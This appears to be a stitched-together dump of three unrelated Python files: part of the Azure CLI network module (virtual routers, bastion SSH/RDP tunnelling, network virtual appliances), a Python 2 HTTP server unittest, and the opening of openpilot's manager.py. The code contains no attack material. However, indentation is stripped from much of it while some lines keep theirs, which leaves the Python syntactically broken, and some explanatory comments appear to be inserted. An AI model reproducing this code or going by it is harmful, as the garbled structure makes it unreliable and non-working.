vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
from azure.core.exceptions import HttpResponseError
try:
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
virtual_hub_name = virtual_router_name
try:
vhub_client.get(resource_group_name, virtual_hub_name)
        raise CLIError('The VirtualRouter "{}" under resource group "{}" already exists'.format(
            virtual_hub_name, resource_group_name))
except HttpResponseError:
pass
SubResource = cmd.get_models('SubResource')
# for old VirtualRouter
if hosted_gateway is not None:
VirtualRouter = cmd.get_models('VirtualRouter')
virtual_router = VirtualRouter(virtual_router_asn=None,
virtual_router_ips=[],
hosted_subnet=None,
hosted_gateway=SubResource(id=hosted_gateway),
location=location,
tags=tags)
return vrouter_client.begin_create_or_update(resource_group_name, virtual_router_name, virtual_router)
# for VirtualHub
VirtualHub, HubIpConfiguration = cmd.get_models('VirtualHub', 'HubIpConfiguration')
hub = VirtualHub(tags=tags, location=location, virtual_wan=None, sku='Standard')
ip_config = HubIpConfiguration(subnet=SubResource(id=hosted_subnet))
from azure.cli.core.commands import LongRunningOperation
vhub_poller = vhub_client.begin_create_or_update(resource_group_name, virtual_hub_name, hub)
LongRunningOperation(cmd.cli_ctx)(vhub_poller)
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
try:
vhub_ip_poller = vhub_ip_config_client.begin_create_or_update(resource_group_name,
virtual_hub_name,
'Default',
ip_config)
LongRunningOperation(cmd.cli_ctx)(vhub_ip_poller)
except Exception as ex:
logger.error(ex)
vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
vhub_client.begin_delete(resource_group_name, virtual_hub_name)
raise ex
return vhub_client.get(resource_group_name, virtual_hub_name)
def virtual_router_update_getter(cmd, resource_group_name, virtual_router_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
return vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError: # 404
pass
virtual_hub_name = virtual_router_name
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
return vhub_client.get(resource_group_name, virtual_hub_name)
def virtual_router_update_setter(cmd, resource_group_name, virtual_router_name, parameters):
if parameters.type == 'Microsoft.Network/virtualHubs':
client = network_client_factory(cmd.cli_ctx).virtual_hubs
else:
client = network_client_factory(cmd.cli_ctx).virtual_routers
# If the client is virtual_hubs,
# the virtual_router_name represents virtual_hub_name and
# the parameters represents VirtualHub
return client.begin_create_or_update(resource_group_name, virtual_router_name, parameters)
def update_virtual_router(cmd, instance, tags=None):
# both VirtualHub and VirtualRouter own those properties
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
return instance
def list_virtual_router(cmd, resource_group_name=None):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
if resource_group_name is not None:
vrouters = vrouter_client.list_by_resource_group(resource_group_name)
vhubs = vhub_client.list_by_resource_group(resource_group_name)
else:
vrouters = vrouter_client.list()
vhubs = vhub_client.list()
return list(vrouters) + list(vhubs)
def show_virtual_router(cmd, resource_group_name, virtual_router_name):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
from azure.core.exceptions import HttpResponseError
try:
item = vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
virtual_hub_name = virtual_router_name
item = vhub_client.get(resource_group_name, virtual_hub_name)
return item
def delete_virtual_router(cmd, resource_group_name, virtual_router_name):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
from azure.core.exceptions import HttpResponseError
try:
vrouter_client.get(resource_group_name, virtual_router_name)
item = vrouter_client.begin_delete(resource_group_name, virtual_router_name)
except HttpResponseError:
from azure.cli.core.commands import LongRunningOperation
virtual_hub_name = virtual_router_name
poller = vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
LongRunningOperation(cmd.cli_ctx)(poller)
item = vhub_client.begin_delete(resource_group_name, virtual_hub_name)
return item
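# Hedged note: delete_virtual_router first tries the legacy virtual_routers client; if that GET
# fails with HttpResponseError, the name is treated as a VirtualHub-backed router, whose
# 'Default' IP configuration must be deleted (and waited on) before the hub itself is removed.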
def create_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name, peer_asn, peer_ip):
# try VirtualRouter first
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
VirtualRouterPeering = cmd.get_models('VirtualRouterPeering')
virtual_router_peering = VirtualRouterPeering(peer_asn=peer_asn, peer_ip=peer_ip)
return vrouter_peering_client.begin_create_or_update(resource_group_name,
virtual_router_name,
peering_name,
virtual_router_peering)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
# try VirtualHub then if the virtual router doesn't exist
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
BgpConnection = cmd.get_models('BgpConnection')
vhub_bgp_conn = BgpConnection(name=peering_name, peer_asn=peer_asn, peer_ip=peer_ip)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.begin_create_or_update(resource_group_name, virtual_hub_name,
bgp_conn_name, vhub_bgp_conn)
def virtual_router_peering_update_getter(cmd, resource_group_name, virtual_router_name, peering_name):
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
from azure.core.exceptions import HttpResponseError
try:
return vrouter_peering_client.get(resource_group_name, virtual_router_name, peering_name)
except HttpResponseError: # 404
pass
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.get(resource_group_name, virtual_hub_name, bgp_conn_name)
def virtual_router_peering_update_setter(cmd, resource_group_name, virtual_router_name, peering_name, parameters):
if parameters.type == 'Microsoft.Network/virtualHubs/bgpConnections':
client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
else:
client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
# if the client is virtual_hub_bgp_connection,
# the virtual_router_name represents virtual_hub_name and
# the peering_name represents bgp_connection_name and
# the parameters represents BgpConnection
return client.begin_create_or_update(resource_group_name, virtual_router_name, peering_name, parameters)
def update_virtual_router_peering(cmd, instance, peer_asn=None, peer_ip=None):
# both VirtualHub and VirtualRouter own those properties
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('peer_ip', peer_ip)
return instance
def list_virtual_router_peering(cmd, resource_group_name, virtual_router_name):
virtual_hub_name = virtual_router_name
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
try:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
vrouter_peerings = list(vrouter_peering_client.list(resource_group_name, virtual_router_name))
except HttpResponseError:
vrouter_peerings = []
virtual_hub_name = virtual_router_name
try:
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connections
vhub_bgp_connections = list(vhub_bgp_conn_client.list(resource_group_name, virtual_hub_name))
except HttpResponseError:
vhub_bgp_connections = []
return list(vrouter_peerings) + list(vhub_bgp_connections)
def show_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
return vrouter_peering_client.get(resource_group_name, virtual_router_name, peering_name)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
# try VirtualHub then if the virtual router doesn't exist
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.get(resource_group_name, virtual_hub_name, bgp_conn_name)
def delete_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except: # pylint: disable=bare-except
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
return vrouter_peering_client.begin_delete(resource_group_name, virtual_router_name, peering_name)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
# try VirtualHub then if the virtual router doesn't exist
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.begin_delete(resource_group_name, virtual_hub_name, bgp_conn_name)
# endregion
# region service aliases
def list_service_aliases(cmd, location, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).available_service_aliases
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name, location=location)
return client.list(location=location)
# endregion
# region bastion
def create_bastion_host(cmd, resource_group_name, bastion_host_name, virtual_network_name,
public_ip_address, location=None, subnet='AzureBastionSubnet', scale_units=None, sku=None, tags=None):
client = network_client_factory(cmd.cli_ctx).bastion_hosts
(BastionHost,
BastionHostIPConfiguration,
SubResource) = cmd.get_models('BastionHost',
'BastionHostIPConfiguration',
'SubResource')
ip_config_name = "bastion_ip_config"
ip_configuration = BastionHostIPConfiguration(name=ip_config_name,
subnet=SubResource(id=subnet),
public_ip_address=SubResource(id=public_ip_address))
bastion_host = BastionHost(ip_configurations=[ip_configuration],
location=location,
tags=tags)
if cmd.supported_api_version(min_api='2021-03-01'):
sku_type = cmd.get_models('Sku')
sku = sku_type(name=sku)
bastion_host = BastionHost(ip_configurations=[ip_configuration],
location=location,
scale_units=scale_units,
sku=sku,
tags=tags)
return client.begin_create_or_update(resource_group_name=resource_group_name,
bastion_host_name=bastion_host_name,
parameters=bastion_host)
def list_bastion_host(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).bastion_hosts
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
SSH_EXTENSION_NAME = 'ssh'
SSH_EXTENSION_MODULE = 'azext_ssh.custom'
SSH_UTILS_EXTENSION_MODULE = 'azext_ssh.ssh_utils'
SSH_EXTENSION_VERSION = '0.1.3'
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _test_extension(extension_name):
from azure.cli.core.extension import (get_extension)
from pkg_resources import parse_version
ext = get_extension(extension_name)
if parse_version(ext.version) < parse_version(SSH_EXTENSION_VERSION):
raise CLIError('SSH Extension (version >= "{}") must be installed'.format(SSH_EXTENSION_VERSION))
def _get_ssh_path(ssh_command="ssh"):
import os
ssh_path = ssh_command
if platform.system() == 'Windows':
arch_data = platform.architecture()
is_32bit = arch_data[0] == '32bit'
sys_path = 'SysNative' if is_32bit else 'System32'
system_root = os.environ['SystemRoot']
system32_path = os.path.join(system_root, sys_path)
ssh_path = os.path.join(system32_path, "openSSH", (ssh_command + ".exe"))
logger.debug("Platform architecture: %s", str(arch_data))
logger.debug("System Root: %s", system_root)
logger.debug("Attempting to run ssh from path %s", ssh_path)
if not os.path.isfile(ssh_path):
raise CLIError("Could not find " + ssh_command + ".exe. Is the OpenSSH client installed?")
else:
raise UnrecognizedArgumentError("Platform is not supported for this command. Supported platforms: Windows")
return ssh_path
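# Hedged example of the Windows path resolution in _get_ssh_path (SystemRoot value hypothetical):
#   64-bit Python, SystemRoot=C:\Windows  ->  C:\Windows\System32\openSSH\ssh.exe
#   32-bit Python, SystemRoot=C:\Windows  ->  C:\Windows\SysNative\openSSH\ssh.exe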
def _get_rdp_path(rdp_command="mstsc"):
import os
rdp_path = rdp_command
if platform.system() == 'Windows':
arch_data = platform.architecture()
sys_path = 'System32'
system_root = os.environ['SystemRoot']
system32_path = os.path.join(system_root, sys_path)
rdp_path = os.path.join(system32_path, (rdp_command + ".exe"))
logger.debug("Platform architecture: %s", str(arch_data))
logger.debug("System Root: %s", system_root)
logger.debug("Attempting to run rdp from path %s", rdp_path)
if not os.path.isfile(rdp_path):
raise CLIError("Could not find " + rdp_command + ".exe. Is the rdp client installed?")
else:
raise UnrecognizedArgumentError("Platform is not supported for this command. Supported platforms: Windows")
return rdp_path
def _get_host(username, ip):
return username + "@" + ip
def _build_args(cert_file, private_key_file):
private_key = []
certificate = []
if private_key_file:
private_key = ["-i", private_key_file]
if cert_file:
certificate = ["-o", "CertificateFile=" + cert_file]
return private_key + certificate
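# Hedged example (hypothetical file names):
#   _build_args('id_rsa-aadcert.pub', 'id_rsa')
#   -> ['-i', 'id_rsa', '-o', 'CertificateFile=id_rsa-aadcert.pub']
# i.e. the private-key flag always precedes the certificate option.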
def ssh_bastion_host(cmd, auth_type, target_resource_id, resource_group_name, bastion_host_name, resource_port=None, username=None, ssh_key=None):
import os
_test_extension(SSH_EXTENSION_NAME)
if not resource_port:
resource_port = 22
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
if auth_type.lower() == 'password':
if username is None:
raise RequiredArgumentMissingError("Please enter username with --username.")
command = [_get_ssh_path(), _get_host(username, 'localhost')]
elif auth_type.lower() == 'aad':
azssh = _get_azext_module(SSH_EXTENSION_NAME, SSH_EXTENSION_MODULE)
azssh_utils = _get_azext_module(SSH_EXTENSION_NAME, SSH_UTILS_EXTENSION_MODULE)
cert_folder = tempfile.mkdtemp(prefix="aadsshcert")
if not os.path.isdir(cert_folder):
os.makedirs(cert_folder)
azssh.ssh_cert(cmd, cert_path=os.path.join(cert_folder, "id_rsa.pub-aadcert.pub"))
private_key_file = os.path.join(cert_folder, "id_rsa")
cert_file = os.path.join(cert_folder, "id_rsa.pub-aadcert.pub")
username = azssh_utils.get_ssh_cert_principals(cert_file)[0]
command = [_get_ssh_path(), _get_host(username, 'localhost')]
command = command + _build_args(cert_file, private_key_file)
elif auth_type.lower() == 'ssh-key':
if username is None or ssh_key is None:
            raise RequiredArgumentMissingError("Please provide both --username and --ssh-key (path to the SSH private key file).")
command = [_get_ssh_path(), _get_host(username, 'localhost')]
command = command + _build_args(None, ssh_key)
else:
raise UnrecognizedArgumentError("Unknown auth type. Use one of password, aad or ssh-key.")
command = command + ["-p", str(tunnel_server.local_port)]
command = command + ['-o', "StrictHostKeyChecking=no", '-o', "UserKnownHostsFile=/dev/null"]
command = command + ['-o', "LogLevel=Error"]
logger.debug("Running ssh command %s", ' '.join(command))
try:
subprocess.call(command, shell=platform.system() == 'Windows')
except Exception as ex:
raise CLIInternalError(ex)
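# Hedged sketch of the command assembled above for --auth-type password (username and
# tunnel port hypothetical):
#   [<ssh path>, 'azureuser@localhost', '-p', '50022',
#    '-o', 'StrictHostKeyChecking=no', '-o', 'UserKnownHostsFile=/dev/null',
#    '-o', 'LogLevel=Error']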
def rdp_bastion_host(cmd, target_resource_id, resource_group_name, bastion_host_name, resource_port=None):
if not resource_port:
resource_port = 3389
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
if platform.system() == 'Windows':
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
command = [_get_rdp_path(), "/v:localhost:{0}".format(tunnel_server.local_port)]
logger.debug("Running rdp command %s", ' '.join(command))
from ._process_helper import launch_and_wait
launch_and_wait(command)
tunnel_server.cleanup()
else:
raise UnrecognizedArgumentError("Platform is not supported for this command. Supported platforms: Windows")
def get_tunnel(cmd, resource_group_name, name, vm_id, resource_port, port=None):
from .tunnel import TunnelServer
client = network_client_factory(cmd.cli_ctx).bastion_hosts
bastion = client.get(resource_group_name, name)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
tunnel_server = TunnelServer(cmd.cli_ctx, 'localhost', port, bastion, vm_id, resource_port)
return tunnel_server
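# Hedged note: when port is None, get_tunnel passes 0 to TunnelServer, which asks the OS for a
# free ephemeral port; callers then read the chosen port back from tunnel_server.local_port, as
# the bastion ssh/rdp/tunnel commands do.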
def create_bastion_tunnel(cmd, target_resource_id, resource_group_name, bastion_host_name, resource_port, port, timeout=None):
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port, port)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
# endregion
# region security partner provider
def create_security_partner_provider(cmd, resource_group_name, security_partner_provider_name,
security_provider_name, virtual_hub, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).security_partner_providers
SecurityPartnerProvider, SubResource = cmd.get_models('SecurityPartnerProvider', 'SubResource')
security_partner_provider = SecurityPartnerProvider(security_provider_name=security_provider_name,
virtual_hub=SubResource(id=virtual_hub),
location=location,
tags=tags)
return client.begin_create_or_update(resource_group_name=resource_group_name,
security_partner_provider_name=security_partner_provider_name,
parameters=security_partner_provider)
def update_security_partner_provider(instance, cmd, security_provider_name=None, virtual_hub=None, tags=None):
with cmd.update_context(instance) as c:
c.set_param('security_provider_name', security_provider_name)
c.set_param('virtual_hub', virtual_hub)
c.set_param('tags', tags)
return instance
def list_security_partner_provider(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).security_partner_providers
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
# endregion
# region network gateway connection
def reset_shared_key(cmd, client, virtual_network_gateway_connection_name, key_length, resource_group_name=None):
ConnectionResetSharedKey = cmd.get_models('ConnectionResetSharedKey')
shared_key = ConnectionResetSharedKey(key_length=key_length)
return client.begin_reset_shared_key(resource_group_name=resource_group_name,
virtual_network_gateway_connection_name=virtual_network_gateway_connection_name, # pylint: disable=line-too-long
parameters=shared_key)
def update_shared_key(cmd, instance, value):
with cmd.update_context(instance) as c:
c.set_param('value', value)
return instance
# endregion
# region network virtual appliance
def create_network_virtual_appliance(cmd, client, resource_group_name, network_virtual_appliance_name,
vendor, bundled_scale_unit, market_place_version,
virtual_hub, boot_strap_configuration_blobs=None,
cloud_init_configuration_blobs=None,
cloud_init_configuration=None, asn=None,
location=None, tags=None, no_wait=False):
(NetworkVirtualAppliance,
SubResource,
VirtualApplianceSkuProperties) = cmd.get_models('NetworkVirtualAppliance',
'SubResource',
'VirtualApplianceSkuProperties')
virtual_appliance = NetworkVirtualAppliance(boot_strap_configuration_blobs=boot_strap_configuration_blobs,
cloud_init_configuration_blobs=cloud_init_configuration_blobs,
cloud_init_configuration=cloud_init_configuration,
virtual_appliance_asn=asn,
virtual_hub=SubResource(id=virtual_hub),
nva_sku=VirtualApplianceSkuProperties(
vendor=vendor,
bundled_scale_unit=bundled_scale_unit,
market_place_version=market_place_version
),
location=location,
tags=tags)
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, network_virtual_appliance_name, virtual_appliance)
def update_network_virtual_appliance(instance, cmd, cloud_init_configuration=None, asn=None):
with cmd.update_context(instance) as c:
c.set_param('virtual_appliance_asn', asn)
c.set_param('cloud_init_configuration', cloud_init_configuration)
return instance
def list_network_virtual_appliance(cmd, client, resource_group_name=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
def create_network_virtual_appliance_site(cmd, client, resource_group_name, network_virtual_appliance_name,
site_name, address_prefix, allow=None, optimize=None, default=None,
no_wait=False):
(BreakOutCategoryPolicies,
Office365PolicyProperties,
VirtualApplianceSite) = cmd.get_models('BreakOutCategoryPolicies',
'Office365PolicyProperties',
'VirtualApplianceSite')
virtual_appliance_site = VirtualApplianceSite(address_prefix=address_prefix,
o365_policy=Office365PolicyProperties(
break_out_categories=BreakOutCategoryPolicies(
allow=allow,
optimize=optimize,
default=default
)))
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, network_virtual_appliance_name, site_name, virtual_appliance_site)
def update_network_virtual_appliance_site(instance, cmd, address_prefix, allow=None, optimize=None, default=None):
with cmd.update_context(instance) as c:
c.set_param('address_prefix', address_prefix)
c.set_param('o365_policy.break_out_categories.allow', allow)
c.set_param('o365_policy.break_out_categories.optimize', optimize)
c.set_param('o365_policy.break_out_categories.default', default)
return instance
# endregion
|
serverTest.py
|
'''
Created on Jul 25, 2014
@author: gigemjt
'''
import unittest
import BaseHTTPServer
import time
import threading
import urllib2
from src.connection.server import RequestHandler
from src.projectManagment import ProjectManagment
from src.projectManagment import Project
HOST_NAME = 'localhost'  # The test server binds locally; the tests connect to this host.
PORT_NUMBER = 9000  # Port used by the local test server.
handlerInstance2 = None
class Test(unittest.TestCase):
def setUp(self):
server_class = BaseHTTPServer.HTTPServer
RequestHandlerMock.protocol_version = "HTTP/1.0"
self.httpd = server_class((HOST_NAME, PORT_NUMBER), RequestHandlerMock)
#print time.asctime(), "Server Starts - %s:%s" % (HOST_NAME, PORT_NUMBER)
        t = threading.Thread(target=self.startServer)
t.daemon = True
t.start()
url = 'http://' + HOST_NAME + ':' + str(PORT_NUMBER) + '/'
urllib2.urlopen(url) #required to create an instance of the handler
time.sleep(1)
print "ending setup"
print
def startServer(self):
print 'starting server!'
try:
self.httpd.serve_forever()
        except:
            # serve_forever() raises once the socket is closed in tearDown(); ignore it.
            pass
def tearDown(self):
print
print 'stopping server'
self.httpd.server_close()
#print time.asctime(), "Server Stops - %s:%s" % (HOST_NAME, PORT_NUMBER)
def testPathTranslator(self):
print 'starting test testPathTranslator'
handler = handlerInstance2
print handler.translate_path('/')
def testWebTranslator(self):
"""Passes if adding /web/index.html to the url redirects the computer to find website folder"""
print 'starting test testWebTranslator'
handler = handlerInstance2
try:
path = handler.translate_path('/web/index.html')
open(path, 'r')
except IOError:
self.fail("Exception was thrown while opening file")
def testWebTranslatorWithDash(self):
"""Passes if adding /web-project/index.html to the url redirects the computer to find website folder"""
print 'starting test testWebTranslator with project'
handler = handlerInstance2
try:
path = handler.translate_path('/web-project/index.html')
open(path, 'r')
except IOError:
self.fail("Exception was thrown while opening file")
def testEmptyProjectTranslator(self):
"""Passes if the default project is correctly found and the correct file is opened"""
print 'starting test testEmptyProjectTranslator'
handler = handlerInstance2
try:
path = handler.translate_path('/project/DevelopmentGraphTestFile')
print path
open(path, 'r')
except IOError:
self.fail("Exception was thrown while opening file")
def testProjectTranslator(self):
"""Passes if the project path is correctly found in the list of current projects"""
print 'starting test testProjectTranslator'
handler = handlerInstance2
projectPath = handler.translate_path('/project/')
print 'project path ' + projectPath
ProjectManagment.getInstance().addProject(Project('DevelopmentGraph', projectPath))
try:
path = handler.translate_path('/project-DevelopmentGraph/DevelopmentGraphTestFile')
print path
open(path, 'r')
except IOError:
self.fail("Exception was thrown while opening file")
class RequestHandlerMock(RequestHandler):
def __init__(self, *args, **kwargs):
global handlerInstance2
handlerInstance2 = self
print 'MAKING INSTANCE OF REQUEST'
RequestHandler.__init__(self, *args, **kwargs)
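# Hedged note: RequestHandlerMock exists only to capture the per-request handler instance that
# BaseHTTPServer creates; the urlopen() call in setUp() triggers exactly one request so the
# tests can reuse that instance through the module-level handlerInstance2.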
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
manager.py
|
#!/usr/bin/env python3
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
import textwrap
from typing import Dict, List
from selfdrive.swaglog import cloudlog, add_logentries_handler
from common.basedir import BASEDIR
from common.hardware import HARDWARE, ANDROID, PC
WEBCAM = os.getenv("WEBCAM") is not None
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1005
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
  # os.wait() returns a tuple with the pid and a 16-bit value
  # whose low byte is the signal number and whose high byte is the exit status
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
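# Hedged worked example of the wait-status decoding above: os.wait() packs the child's exit code
# into the high byte of the 16-bit status, so a raw status of 0x0100 decodes to
# exit_status = 0x0100 >> 8 = 1, which is then propagated through os._exit().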
if __name__ == "__main__":
unblock_stdout()
from common.spinner import Spinner
from common.text_window import TextWindow
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner(noop=(__name__ != "__main__" or not ANDROID))
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline() # type: ignore
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n') # type: ignore
compile_output += r
if retry:
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache")
else:
print("scons build failed after retry")
sys.exit(1)
else:
        # Build failed: collect and log the errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
no_ui = __name__ != "__main__" or not ANDROID
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s, noop=no_ui) as t:
t.wait_for_exit()
exit(1)
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common.apk import update_apks, pm_apply_packages, start_offroad
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
